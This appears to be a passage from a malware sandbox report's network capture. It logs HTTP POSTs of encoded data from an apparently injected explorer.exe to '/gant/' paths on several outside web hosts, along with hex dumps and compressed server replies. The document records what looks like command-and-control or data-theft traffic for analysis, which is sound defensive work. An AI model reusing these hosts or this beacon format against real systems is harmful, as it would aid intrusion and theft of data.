72 4d 4c 73 75 6b 76 75 49 32 47 77 53 62 5f 6f 45 62 4a 33 34 51 4e 73 39 6a 4b 4b 64 30 54 34 38 6f 30 78 45 4a 39 7a 4e 50 71 56 75 7e 79 79 65 68 4e 64 49 32 51 72 44 62 71 5a 46 43 4f 28 6a 32 35 6a 43 62 4e 66 65 74 48 44 45 59 65 4d 44 31 34 56 4e 64 2d 66 6a 4a 46 76 42 76 57 38 2e 00 00 00 00 00 00 00 00
                                                                                                                  Data Ascii: j-Jh9P=oEdsU0kVgAw-vdVLU-8ceWRKLKPshu3URRgHPaqr475t6EjiDfAXiC6VYgqtf1C5SmC4szMiVzntHGDoA9QrzfX7SLy3sYbSS_E1FeCf8HJPYaHWEaeqZJBNkcg7c-7_ZXADIuGNNTiYWNAVVrMmOy(cPLkeZue85WaHYVb82XxqNCOu39a4UmwpAodGRw7lBDt3STFx70RUXNtFts9FX7FRj1xppVpoKoJuS8zNnIzFzYGGd05kgIwyhgPeWWLRHHXYVKJlpAyfMyAX91shXMM8Cy09iQZdtcOwpIj23bD4eK17aB~2B4zdwy(VauP4CxdT9zTSlIKiQAgolKViIM~1RCCnEoyCFb~_UQ52xSRClgxx~6AVFIoekz7WFxaMN2bxp8gMKqQJvAQeN6AvYAWtSQKZp-WLL6zCDv3rMLsukvuI2GwSb_oEbJ34QNs9jKKd0T48o0xEJ9zNPqVu~yyehNdI2QrDbqZFCO(j25jCbNfetHDEYeMD14VNd-fjJFvBvW8.
                                                                                                                  Feb 13, 2023 19:05:54.302207947 CET1588INHTTP/1.1 200 OK
                                                                                                                  Connection: close
                                                                                                                  x-powered-by: PHP/7.4.33
                                                                                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                  cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                  content-type: text/html; charset=UTF-8
                                                                                                                  retry-after: Sat, 25 Mar 2023 11:59:00 UTC
                                                                                                                  content-length: 771
                                                                                                                  content-encoding: gzip
                                                                                                                  vary: Accept-Encoding
                                                                                                                  date: Mon, 13 Feb 2023 18:05:54 GMT
                                                                                                                  server: LiteSpeed
                                                                                                                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 cd 56 4b 6f e3 36 10 be 07 c8 7f 18 30 40 7a d8 4a b4 ec d4 eb 24 92 16 c5 02 3d 15 e8 61 17 ed 99 96 46 12 61 8a 64 c9 91 15 ff fb 82 94 15 ab 49 bb 45 fa c2 1e 4c 0f 87 1c f2 fb e6 45 5d 5f 5d 5f 01 84 df 1f 8d 39 49 52 58 fe 28 0e 08 3f 4b 1c e1 fb 81 4c 2f 04 49 a3 41 7a 18 74 8d 0e 2a a3 3d b9 a1 0a da 9c 4f 26 af 4f cc 95 d4 07 e8 1c 36 05 eb 88 ac 7f e0 bc 31 9a 7c ba 1f b4 3e a5 1a 89 57 de 7f 68 44 2f d5 a9 f8 c1 61 6d 0e e2 dd 4f 1a 19 38 54 05 f3 74 52 e8 3b 44 62 e5 74 fc 74 e4 cb c5 c5 1d 0f 9c 2b 71 c0 a3 c4 51 44 e4 01 62 5a 99 9e 8f 36 a9 8c 26 d4 c4 ad 1a 5a a9 3d 8f 64 82 f6 99 4c 62 45 8b 9c 3a ec d1 07 6c 7c 6f 0c 79 72 c2 a6 bd d4 69 40 7b 2c 36 e9 fd 96 01 9d 2c 16 8c f0 29 92 60 e5 d5 ff 8e ad 32 7d 1f c8 7d 3d a0 94 f1 58 f3 18 b6 af 09 96 f7 31 ef 12 31 a2 37 3d be 29 94 b2 32 9a fd 47 09 26 7b d1 a2 e7 8d 38 86 5b 52 ab 5b 06 3c 66 fa f5 a2 48 f3 5a 1e 41 d6 05 eb d0 99 24 da cc e5 00 90 cb be 05 ef aa a9 c2 fe d5 ec 9f 82 59 c5 bf 09 9b 50 54 b0 4f 92 30 74 82 cf d8 5b e3 84 93 ea 04 1f e3 26 68 8c 83 8f 8b 6a 62 10 5b c3 db 6c e6 4a e7 b5 3c ce 72 f0 40 a5 84 f7 05 0b 35 2c a4 46 17 7c 30 35 05 80 e8 a2 f3 06 67 c6 8b 7b 7e bf 54 19 95 3c f9 24 5b 43 90 fa 7a 96 54 9b 64 eb a5 11 40 de 65 e5 27 e3 dc e9 5b 18 f1 1b 87 50 1b a9 5b 08 e9 03 a3 71 07 30 1a a8 43 f0 92 30 e7 5d 76 46 1a 9a 6a be 40 7e 99 fd 53 a8 bb 19 b3 69 1a 8f 94 4c 1c 54 9b bc 9c ef 5e 10 b1 4b cf a1 26 56 7e ee 84 3e c0 c9 0c 31 60 7b 0c c4 ac 20 89 9a 52 f8 05 41 7c 99 2e 08 5d c3 28 95 82 3d c2 5e 54 07 f0 9d 71 a4 4e 69 ce ed df f6 43 cc 70 6f 2a 29 d4 92 c0 32 b2 6f 09 9f 58 94 6c 78 77 84 95 e9 d8 09 f2 c2 da f8 1c 78 d4 f5 07 db 19 8d c5 7a 73 b7 cb b6 db dd dd e6 fd 76 c3 ca 5c ce 1e 6b 04 34 22 99 cd 82 bc 79 62 65 ce 65 99 73 51 e6 f3 1d bd 90 8a cc c3 ed 4d b6 fa ee f1 f6 26 cb 56 61 5c ad a3 9c 3d de de ac b6 77 51 b3 0b f2 fd fb 28 4f 63 58 cd b2 a0 3f db ae 26 cd 7d d8 79 b7 8d fb 83 9c 65 51 bf ba 7f 7c 8d 0f f5 11 95 b1 f8 a7 f8 08 d5 c3 bb bf 20 19 3d 91 f8 5f 87 10 fc 17 44 e7 d4 bd 24 73 48 f3 cb ec fc 34 2f d2 fe b9 65 29 d3 4a 9d ec 07 a2 d0 45 cf 15 aa 4c db 62 6d 06 62 17 1f 86 ef 83 2f 76 af 78 52 6a 3b fb da 01 a3 71 b5 75 e8 7d 00 be 7e 62 20 9c 14 49 27 eb 1a 75 c1 c8 0d b8 08 da 33 ca d0 3d 7e 03 54 89 bc 6f 0c 09 00 00
                                                                                                                  Data Ascii: VKo60@zJ$=aFadIELE]_]_9IRX(?KL/IAzt*=O&O61|>WhD/amO8TtR;Dbtt+qQDbZ6&Z=dLbE:l|oyri@{,6,)`2}}=X117=)2G&{8[R[<fHZA$YPTO0t[&hjb[lJ<r@5,F|05g{~T<$[CzTd@e'[P[q0C0]vFj@~SiLT^K&V~>1`{ RA|.](=^TqNiCpo*)2oXlxwxzsv\k4"ybeesQM&Va\=wQ(OcX?&}yeQ| =_D$sH4/e)JELbmb/vxRj;qu}~b I'u3=~To


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  7192.168.11.2049848103.191.208.5080C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:00:26.736594915 CET517OUTPOST /gant/ HTTP/1.1
                                                                                                                  Host: www.treebarktees.com
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 188
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Origin: http://www.treebarktees.com
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Accept: */*
                                                                                                                  Referer: http://www.treebarktees.com/gant/
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Data Raw: 6a 2d 4a 68 39 50 3d 65 77 4b 6d 37 6c 6b 74 38 77 67 42 47 38 41 6e 6e 77 39 7a 37 62 30 69 51 37 4a 6d 74 75 62 70 75 35 6f 55 4c 59 46 71 4d 56 49 4f 59 50 4d 55 73 77 38 46 54 38 38 67 70 6c 72 76 74 70 64 52 71 4b 35 77 61 4b 6a 77 6e 30 31 5f 71 47 41 44 43 73 75 5a 44 48 48 54 30 44 52 6e 58 52 49 64 70 56 32 4b 39 50 77 44 41 34 49 77 67 66 62 6d 33 6c 41 41 4d 6f 69 4c 59 78 35 51 79 4a 6c 5f 37 7a 6d 36 36 32 6b 36 6f 59 47 70 35 30 79 65 56 34 73 69 32 2d 67 49 6e 33 4a 49 69 70 70 57 72 52 6d 70 65 31 62 31 71 30 6e 67 6f 73 73 44 68 51 29 2e 00 00 00 00 00 00 00 00
                                                                                                                  Data Ascii: j-Jh9P=ewKm7lkt8wgBG8Annw9z7b0iQ7Jmtubpu5oULYFqMVIOYPMUsw8FT88gplrvtpdRqK5waKjwn01_qGADCsuZDHHT0DRnXRIdpV2K9PwDA4Iwgfbm3lAAMoiLYx5QyJl_7zm662k6oYGp50yeV4si2-gIn3JIippWrRmpe1b1q0ngossDhQ).
                                                                                                                  Feb 13, 2023 19:00:27.744930029 CET519INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx
                                                                                                                  Date: Mon, 13 Feb 2023 18:00:27 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  x-powered-by: PHP/8.1.15
                                                                                                                  x-litespeed-tag: 90d_HTTP.404
                                                                                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                  cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                  link: <https://treebarktees.com/index.php/wp-json/>; rel="https://api.w.org/"
                                                                                                                  x-litespeed-cache-control: no-cache
                                                                                                                  content-encoding: gzip
                                                                                                                  vary: Accept-Encoding
                                                                                                                  Data Raw: 31 61 36 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d 6b 93 e3 b6 b1 e8 e7 9d aa fc 07 98 5b de 19 25 24 45 f0 25 4a f3 f0 49 d6 ce b1 ab ec 24 95 75 7c ea 56 d6 35 05 91 90 c4 5d 8a 64 48 6a 34 e3 39 53 75 ff c6 fd 7b f7 97 dc ea 06 48 82 12 f5 98 57 ee c9 63 13 ef 52 24 d0 dd 68 34 1a 8d 46 a3 71 f1 c5 d7 7f 7c ff e3 ff fa d3 37 64 51 2d 93 ab 93 0b f8 87 24 2c 9d 5f 6a 3c 35 fe f2 41 83 77 9c 45 57 27 6f 2e 96 bc 62 24 5c b0 a2 e4 d5 a5 f6 97 1f 7f 6f 04 1a 19 36 5f 52 b6 e4 97 da 4d cc d7 79 56 54 1a 09 b3 b4 e2 69 75 a9 ad e3 a8 5a 5c 46 fc 26 0e b9 81 3f 74 12 a7 71 15 b3 c4 28 43 96 f0 4b 8a 70 88 fc 73 51 56 77 09 bf 3a a9 7f c3 bf e6 3a cb a7 46 b9 66 55 b8 20 f7 9d 4f f0 79 19 a7 02 f2 84 d8 5e 7e 7b de 5b 60 c1 e3 f9 a2 ea 2b f1 d0 29 df c1 15 2f e7 3d f8 b0 15 7d 90 80 98 63 f0 5c 0c 65 23 4f 04 5b 91 79 a7 45 36 cd aa f2 b4 61 dd e9 92 dd 1a f1 92 cd b9 91 17 1c 58 3b 49 58 31 e7 a7 c0 f6 8b 2a ae 12 7e f5 27 36 e7 24 cd 2a 32 cb 56 69 44 de bd 0d 6c 4a cf c9 8f 05 e7 53 56 7c be 18 8a 62 27 17 49 9c 7e 26 05 4f 2e 4f a3 b4 04 78 33 5e 85 8b 53 b2 28 f8 ec f2 74 38 ac 64 8d 8a f3 d2 0c b3 a5 40 d2 d4 d2 58 52 f1 22 65 15 d7 48 75 97 f3 4b 8d e5 79 12 87 ac 8a b3 74 58 94 e5 6f 6e 97 89 46 10 db a5 56 a3 27 ef 0a f6 b7 55 76 4e 7e cf 79 a4 09 5c da a2 aa f2 72 b2 8d 71 18 a7 11 bf 35 f3 45 3e 9c 71 1e 0d 51 2a 5a ba 9f 49 c1 fb 6c b9 e4 69 55 3e 96 94 50 d6 53 69 2a c3 22 ce ab ab 93 75 9c 46 d9 da bc 5e e7 7c 99 7d 8a 3f f0 aa 8a d3 79 49 2e c9 bd 36 65 25 ff 4b 91 68 13 d9 de 8f c3 8f c3 d2 5c 9b 59 31 ff 38 c4 4e 2d 3f 0e c3 ac e0 1f 87 58 f9 e3 90 ba a6 65 5a 1f 87 23 fb 76 64 7f 1c 6a ba c6 6f 2b 6d a2 99 79 3a d7 74 ad bc 99 3f 0d 5e 79 33 47 68 e5 cd fc 1b 01 b0 bc 41 80 d9 aa 08 b9 36 b9 d7 c2 2c 0d 59 85 64 48 7a 27 40 ee a6 48 7c 1c ae 73 23 4e c3 64 15 f1 f2 e3 f0 53 89 2f b0 9a 51 f0 84 b3 92 9b cb 38 35 3f 95 5f dd f0 e2 d2 37 a9 49 b5 87 87 f3 93 e1 af bf 20 3f 2e e2 92 cc e2 84 93 b8 24 6c 55 65 c6 9c a7 bc 60 15 8f c8 af 87 27 5f cc 56 69 08 b2 74 c6 75 a6 57 83 fb 1b 56 90 54 2f f4 4c 8f 2f 99 19 16 9c 55 fc 9b 84 43 1f 9e 69 21 4b 6f 58 a9 0d f4 fc 32 36 e7 bc 7a 0f ca e6 b6 7a f7 4e fd 75 a6 d9 91 36 38 af 01 93 f2 8c d7 80 d9 e5 87 aa 88 d3 b9 39 2b b2 e5 fb 05 2b de 67 11 d7 f9 e5 59 6e 86 09 67 c5 9f 79 58 9d 59 ba a5 c7 a6 d0 58 b1 29 86 f5 40 cf cd 59 9c 24 3f f2 db ea 8c 99 30 06 ee ce aa 45 5c ea 7c a0 5b ba 35 d0 63 b3 ca be 66 15 fb cb 9f bf
                                                                                                                  Data Ascii: 1a60}k[%$E%JI$u|V5]dHj49Su{HWcR$h4Fq|7dQ-$,_j<5AwEW'o.b$\o6_RMyVTiuZ\F&?tq(CKpsQVw::FfU Oy^~{[`+)/=}c\e#O[yE6aX;IX1*~'6$*2ViDlJSV|b'I~&O.Ox3^S(t8d@XR"eHuKytXonFV'UvN~y\rq5E>qQ*ZIliU>PSi*"uF^|}?yI.6e%Kh\Y18N-?XeZ#vdjo+my:t?^y3GhA6,YdHz'@H|s#NdS/Q85?_7I ?.$lUe`'_VituWVT/L/UCi!KoX26zzNu689++gYngyXYX)@Y$?0E\|[5cf
                                                                                                                  Feb 13, 2023 19:00:27.745023012 CET520INData Raw: 3f 1b 0c ce 0b 5e ad 8a 94 3c 1d 6e 25 e1 f2 cb cb cb 0e ec 87 a6 61 e1 19 17 fc aa b6 39 25 44 55 1b 9c 57 66 59 84 97 5c af cc 88 cf 78 71 59 99 62 18 03 df 86 9f d8 0d 93 25 75 06 0c 95 9c 2e 7f 77 f7 23 9b ff 81 2d f9 99 06 f3 80 36 f8 ab f5
                                                                                                                  Data Ascii: ?^<n%a9%DUWfY\xqYb%u.w#-63EDgagoilYYr{~j6yLx:o~3h5ku,Apq'q/*5&%cEM\?Vq0
                                                                                                                  Feb 13, 2023 19:00:27.745090008 CET521INData Raw: dc b7 2c a9 09 6b 11 a4 59 17 c5 83 22 f0 b2 b4 c9 0a 6e d4 f3 53 72 27 66 28 1e 19 55 96 df ab 04 21 d0 b2 62 45 75 3c 8c 90 a7 15 2f 3a 60 c4 ab e3 41 08 86 76 40 20 25 3c 8d 5a 96 b0 5b e9 0b 1b 05 b4 97 25 42 32 e2 d2 48 b3 ca 28 2b 16 7e e6
                                                                                                                  Data Ascii: ,kY"nSr'f(U!bEu</:`Av@ %<Z[%B2H(+~2\mqLYjY_*bm<p:9X-!&"[O68}gFD`.nzHk^h@5[*m`YQ)=oGuLIs~$F)x-y2;t(1>wA?
                                                                                                                  Feb 13, 2023 19:00:27.745152950 CET523INData Raw: ba 1e f0 cd 8e 06 86 b7 9d 51 93 0e fa 2b 08 a5 21 37 5c 5a f1 55 e7 94 f6 ad c1 d2 70 91 15 3b 44 bb bf 4e ff 5b 09 69 c2 c2 2a be e1 2f 08 10 15 de 0b c2 bb 89 61 06 8a 5e 0e 22 2e 53 c4 7a ac b3 0c d9 5a 98 ec e8 af c6 d3 88 fe 0a 23 c9 e6 59
                                                                                                                  Data Ascii: Q+!7\ZUp;DN[i*/a^".SzZ#Y6`S'YsFb%%KpD,B{PQ2!Af(0xH9"0XA_l/iJ>v`|4k6{Qd*z0\/^Vg,,F~v
                                                                                                                  Feb 13, 2023 19:00:27.745214939 CET524INData Raw: 87 59 74 55 70 0f a6 16 5a c1 13 06 21 30 af 42 f7 1c 02 a5 78 da e3 83 c6 60 a6 9c 41 14 fc ab 60 8e e2 a5 61 dd 67 39 0b e3 ea 6e a2 4e c0 3d dc 78 7a af 18 b4 45 62 aa c7 f2 5e 16 8b ad 60 b1 5f 8d 5f 8e 82 c5 79 35 2c ae 82 45 0d ff 79 59 8e
                                                                                                                  Data Ascii: YtUpZ!0Bx`A`ag9nN=xzEb^`__y5,EyYy+XTe`Z[KjXaV3!%L3xP&A9b`kC!9_dt5WjyjM(_MTA4=qf<K8w1I6ELI
                                                                                                                  Feb 13, 2023 19:00:27.745279074 CET525INData Raw: fe 61 16 cf 57 05 6f 16 ba c4 02 ff 42 ff 12 64 9e 64 53 b8 f2 00 16 fe 1b 47 de a7 59 74 27 96 1f 8d b1 8a 52 6b 18 d3 84 85 9f 27 04 62 93 21 ea b5 37 ff 66 6d bd c5 c2 c0 ba 9b 90 b7 6c 3a 0d 42 a7 bf f8 7a 11 57 7c 42 de ce f0 4f 7f 99 9c 25
                                                                                                                  Data Ascii: aWoBddSGYt'Rk'b!7fml:BzW|BO%PFAb<a><6qJiofE|H:l9ogtwitMp*W91~)5Gt04JSyB;:Zg$SN[yY]!86!o#Q
                                                                                                                  Feb 13, 2023 19:00:27.746512890 CET526INData Raw: 31 63 34 38 0d 0a e2 ef 83 b4 8c 23 cc 2b 34 21 d4 84 6c f5 3b c1 2d b3 08 ef 28 9a 10 7b 7f c1 69 3c 9f 10 67 1f a8 69 3c 9f 83 05 eb ee 2b c4 61 4d 9d ad ca 09 a1 56 7f b9 19 5b c6 c9 9d 61 f0 14 0e 46 18 25 4b cb 09 d1 be c1 5f e4 03 4b 4b 4d
                                                                                                                  Data Ascii: 1c48#+4!l;-({i<gi<+aMV[aF%K_KKM'(y6ZHoX|E"5!twF.$a/wW5!{xE6IXG@mD(_TeEq:!^P/nbG#PZgjIb_} {a:HC)4
                                                                                                                  Feb 13, 2023 19:00:27.746606112 CET528INData Raw: 1a 83 ae c2 a8 af 71 ad 3d e2 3b 54 5d dd b5 cd 42 bd 2e 0f 33 f1 a0 99 96 a5 b5 bd 9b a8 ed fa c2 2e 6c 20 ec d6 f4 bb 49 10 75 5a 2a 84 65 f8 18 22 d0 58 dd 0a 39 c5 9b ce b7 ae c8 d9 0d 57 e5 78 a3 70 06 e7 b8 ec ee 0e 4d 71 d5 c3 ae 01 2a 2f
                                                                                                                  Data Ascii: q=;T]B.3.l IuZ*e"X9WxpMq*/3pNI0Y6<-`'tSnrY2h.)\dp`O=C=V;y$c6Cz wGBy$nq-8PQ"
                                                                                                                  Feb 13, 2023 19:00:27.746675014 CET529INData Raw: 6c ca 2e 4f 59 92 9c 92 e1 d5 c9 c5 71 b4 a2 31 20 d3 87 bd 1a c1 0a 92 1d 54 67 69 72 47 04 19 84 a5 11 81 5c ce 22 b7 d4 84 8c fc 20 bf 1d 3c a6 51 73 9e f2 82 25 c6 6b 35 68 47 23 1e c9 7a 54 b4 32 8b ec 6b 89 4a 8b e3 10 cd ed 3c a6 48 60 ad
                                                                                                                  Data Ascii: l.OYq1 TgirG\" <Qs%k5hG#zT2kJ<H`+bq^yub*"&*51U\qFo+.a=PP~1ql]B:l7!70!{I-Ky8'DkKUp%<awRY. E(8qM(tH
                                                                                                                  Feb 13, 2023 19:00:27.746741056 CET530INData Raw: d8 90 89 0d 88 44 17 ea 9b ba 09 48 eb c5 70 c1 59 74 75 72 72 81 79 b1 a4 a1 c2 8b 22 2b 5c cb 25 70 10 7c 39 e5 78 77 4f 9e a5 65 7c c3 89 d8 4b 90 2b 24 a2 da 34 69 66 7c 2a 35 98 31 6f e6 e4 76 99 a4 e5 65 2d 1a eb f5 da 5c 3b 38 22 6c cb b2
                                                                                                                  Data Ascii: DHpYturry"+\%p|9xwOe|K+$4if|*51ove-\;8"l\#^ju<w}Y7]#]j3\#E? MFmEE<='=7M19i.!F.">+.fqR"%b39K?Qa1^0"&
                                                                                                                  Feb 13, 2023 19:00:27.871916056 CET532INData Raw: cf 31 7c d3 23 be 39 22 e2 9d 67 f8 a6 4f c4 3b 9f 50 83 fe a2 5d 5d 0c 01 38 04 7d c1 06 a2 2a 5a 4f 95 ae 5a cd 75 44 ab 79 d9 76 dd 2a d9 db 11 a8 7b e3 94 17 1a 04 a1 d4 45 61 f2 7b bc 22 ec 91 62 03 d4 61 9f f6 33 20 8a 06 a7 d3 4d 63 a6 15
                                                                                                                  Data Ascii: 1|#9"gO;P]]8}*ZOZuDyv*{Ea{"ba3 Mc|}-F6\d$)gi]]_DkWY~1*WbN&4b-/YQdyg0V9U3\%n1J76lBD?GW:],Yv1k^bs_DFS


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  70192.168.11.2049928142.44.131.17780C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:05:56.453567982 CET1597OUTPOST /gant/ HTTP/1.1
                                                                                                                  Host: www.lakeviewautomation.com
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 51816
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Origin: http://www.lakeviewautomation.com
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Accept: */*
                                                                                                                  Referer: http://www.lakeviewautomation.com/gant/
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Data Raw: 6a 2d 4a 68 39 50 3d 6f 45 64 73 55 30 6b 56 67 41 77 2d 76 64 56 4c 55 2d 38 63 65 57 52 4b 4c 4b 50 73 68 75 33 55 52 52 67 48 50 61 71 72 34 37 78 74 36 56 44 69 4d 63 34 58 6a 43 36 56 51 41 71 6f 66 31 43 30 53 6d 61 38 73 7a 77 49 56 77 66 74 48 52 48 6f 41 4c 45 72 6c 50 58 36 58 4c 79 35 6f 59 62 4f 53 5f 34 68 46 65 47 68 38 7a 42 50 4b 70 7a 57 41 70 47 70 47 70 42 4c 6b 63 67 42 52 65 37 64 5a 58 4d 54 49 76 36 4e 4e 56 69 59 58 5f 49 56 58 59 55 6d 57 53 28 64 42 72 6b 52 51 4f 65 56 35 57 6d 31 59 56 62 57 32 57 6c 71 4e 42 71 75 77 36 4f 37 55 47 77 70 44 6f 64 46 56 77 48 68 42 44 77 30 53 54 42 78 37 79 78 55 58 74 74 46 6d 76 6c 45 41 72 46 58 6e 31 78 2d 7e 46 74 67 4b 6f 63 58 53 34 72 4e 6b 34 33 46 79 72 65 47 62 51 74 6b 74 49 77 30 76 41 50 42 41 6d 4c 4e 48 48 6e 75 56 4a 42 62 70 48 4b 66 4d 58 4d 58 34 55 73 69 46 73 4d 41 65 69 30 6f 7a 41 64 52 74 66 6d 53 70 49 6a 6d 33 61 33 34 65 36 46 37 62 44 47 31 42 6f 7a 65 70 69 28 4d 56 4f 7a 2d 43 78 70 74 39 7a 72 43 6c 4c 6d 69 66 41 67 6f 33 35 4e 68 52 73 7e 2d 66 53 43 50 4c 49 7a 61 46 61 43 56 55 55 68 49 32 69 31 43 33 41 68 78 76 61 41 4b 41 6f 6f 61 71 54 37 55 42 78 61 4d 4e 32 58 4c 70 38 6b 4d 4b 66 38 4a 75 33 55 65 64 64 55 76 61 41 57 33 53 51 4b 49 70 2d 4c 31 4c 37 4c 73 44 76 6e 42 4d 4e 30 75 39 61 43 49 31 48 77 52 64 50 6f 46 52 70 32 75 49 74 68 6e 6a 4b 47 46 30 58 63 73 6f 6a 4a 45 50 4d 44 4e 4c 71 56 74 37 53 79 5a 6b 4e 64 6b 38 77 33 66 62 71 55 34 43 50 4c 7a 32 36 54 43 61 49 6d 70 35 32 50 67 4c 2d 41 35 78 34 4a 4c 65 5a 6e 6f 55 32 6a 72 37 41 64 6e 48 41 68 5f 48 38 6d 59 4e 53 7e 5a 71 42 77 58 4b 72 50 66 38 5f 67 45 4a 52 33 6e 53 32 6f 64 50 49 62 77 6c 6d 47 51 54 76 61 4e 35 52 79 72 46 6f 71 63 53 42 45 50 61 77 79 6b 32 6d 30 4d 73 45 49 73 50 69 4f 2d 53 41 56 70 30 6f 71 70 45 37 4f 41 57 31 71 4b 59 4f 57 52 31 65 6a 2d 49 71 73 30 58 4a 75 49 61 4b 57 32 4b 5a 54 71 6a 6c 56 36 4d 73 68 58 6a 78 66 74 4f 49 62 62 53 48 56 69 31 66 38 37 72 6e 68 62 44 5a 4f 78 70 31 4f 55 6c 68 56 30 56 63 41 4b 51 32 6c 47 55 30 36 61 78 6e 6f 58 56 61 51 67 4d 69 33 51 63 65 56 66 45 56 4a 4e 64 4a 33 78 55 44 64 31 68 32 31 76 51 4a 44 53 44 70 75 78 6f 4a 4a 4f 56 64 34 36 67 6f 56 45 68 6b 58 50 55 31 69 4e 38 48 74 32 51 46 41 6f 79 54 53 32 48 4f 5a 6f 36 4c 76 48 48 71 33 41 6f 4f 57 52 44 58 75 61 32 79 46 70 4c 71 64 79 28 61 47 4f 64 2d 53 61 55 6d 61 2d 64 50 65 67 45 53 38 4e 35 52 4e 77 6a 70 4e 46 35 64 49 61 46 2d 55 67 72 54 4e 45 53 68 52 41 47 55 54 72 69 6f 50 6e 73 36 64 72 57 79 69 30 73 43 30 71 39 70 30 52 31 50 62 69 68 50 37 4d 50 45 4d 50 41 6e 7a 7a 7e 4a 70 4b 62 66 41 73 73 41 39 33 46 6c 6e 30 50 49 39 59 73 35 66 65 33 35 54 2d 37 30 55 36 52 6a 30 62 68 61 6d 39 59 76 6b 73 57 39 36 35 4e 4f 69 79 70 61 6e 69 63 6f 74 41 4a 68 6a 56 59 5f 4c 63 6b 6b 6f 49 48 54 63 4e 48 44 58 36 6d 57 63 44 68 45 33 79 56 76 75 32 62 2d 73 4a 56 4d 58 43 63 65 76 56 30 46 53 32 6e 6c 5a 4f 46 50 7e 71 47 78 28 38 67 4d 63 6b 68 78 63 42 58 49 4d 71 78 36 28 2d 39 32 4f 47 63 35 31 39 41 39 39 59 37 77 64 74 35 6d 41 77 68 53 58 38 28 4b 34 31 37 71 72 78 35 32 67 65 5a 33 4d 37 79 58 75 42 43 4c 47 58 45 4e 57 59 54 5f 79 4f 54 37 55 44 77 70 62 6a 31 4f 4a 6e 53 50 39 33 78 50 50 51 35 6b 34 33 28 41 39 32 46 36 71 65 7a 6a 4d 44 74 78 71 36 49 65 47 4f 78 72 39 37 6d 47 36 72 31 79 51 49 39 6b 6f 7a 77 4b 66 64 4f 53 37 35 53 67 36 41 64 31 43 33 37 6e 44 4b 75 59 67 6f 44 4e 33 53 55 7a 7e 47 68 47 49 35 41 65 57 4f 43 6f 54 67 79 35 5a 69 77 4c 48 5f 69 42 66 4c 4d 51 67 35 45 79 55 53 75 76 32 6e 61 34 58 70 4c 50 30 39 70 61 6e 51 68 48 61 4b 6a 4c 66 2d 49 72 39 56 63 72 4c 7a 64 37 4e 34 42 50 6a 51 50 64 32 31 42 59 50 46 74 38 55 6f 34 62 6c 74 67 66 31 6d 78 61 57 53 6a 51 59 4f 50 68 69 4c 36 62 53 78 56 63 7a 4b 65 52 33 47 68 39 6c 36 75 4c 73 55 71 45 48 6b 48 48 50 68 71 52 57 42 69 33 7a 36 4b 4e 55 31 34 59 41 52 75 2d 6f 61 67 59 35 4e 71 4e 77 6c 4d 6a 31 76 75 31 57 6d 72 53 5a 75 7a 6c 35 6f 4e 69 44 77 47 77 30 71 57 4c 6b 64 76 65 6b 54 4c 4d 43 62 39 64 35 35 39 56 57 4c
                                                                                                                  Data Ascii: j-Jh9P=oEdsU0kVgAw-vdVLU-8ceWRKLKPshu3URRgHPaqr47xt6VDiMc4XjC6VQAqof1C0Sma8szwIVwftHRHoALErlPX6XLy5oYbOS_4hFeGh8zBPKpzWApGpGpBLkcgBRe7dZXMTIv6NNViYX_IVXYUmWS(dBrkRQOeV5Wm1YVbW2WlqNBquw6O7UGwpDodFVwHhBDw0STBx7yxUXttFmvlEArFXn1x-~FtgKocXS4rNk43FyreGbQtktIw0vAPBAmLNHHnuVJBbpHKfMXMX4UsiFsMAei0ozAdRtfmSpIjm3a34e6F7bDG1Bozepi(MVOz-Cxpt9zrClLmifAgo35NhRs~-fSCPLIzaFaCVUUhI2i1C3AhxvaAKAooaqT7UBxaMN2XLp8kMKf8Ju3UeddUvaAW3SQKIp-L1L7LsDvnBMN0u9aCI1HwRdPoFRp2uIthnjKGF0XcsojJEPMDNLqVt7SyZkNdk8w3fbqU4CPLz26TCaImp52PgL-A5x4JLeZnoU2jr7AdnHAh_H8mYNS~ZqBwXKrPf8_gEJR3nS2odPIbwlmGQTvaN5RyrFoqcSBEPawyk2m0MsEIsPiO-SAVp0oqpE7OAW1qKYOWR1ej-Iqs0XJuIaKW2KZTqjlV6MshXjxftOIbbSHVi1f87rnhbDZOxp1OUlhV0VcAKQ2lGU06axnoXVaQgMi3QceVfEVJNdJ3xUDd1h21vQJDSDpuxoJJOVd46goVEhkXPU1iN8Ht2QFAoyTS2HOZo6LvHHq3AoOWRDXua2yFpLqdy(aGOd-SaUma-dPegES8N5RNwjpNF5dIaF-UgrTNEShRAGUTrioPns6drWyi0sC0q9p0R1PbihP7MPEMPAnzz~JpKbfAssA93Fln0PI9Ys5fe35T-70U6Rj0bham9YvksW965NOiypanicotAJhjVY_LckkoIHTcNHDX6mWcDhE3yVvu2b-sJVMXCcevV0FS2nlZOFP~qGx(8gMckhxcBXIMqx6(-92OGc519A99Y7wdt5mAwhSX8(K417qrx52geZ3M7yXuBCLGXENWYT_yOT7UDwpbj1OJnSP93xPPQ5k43(A92F6qezjMDtxq6Ie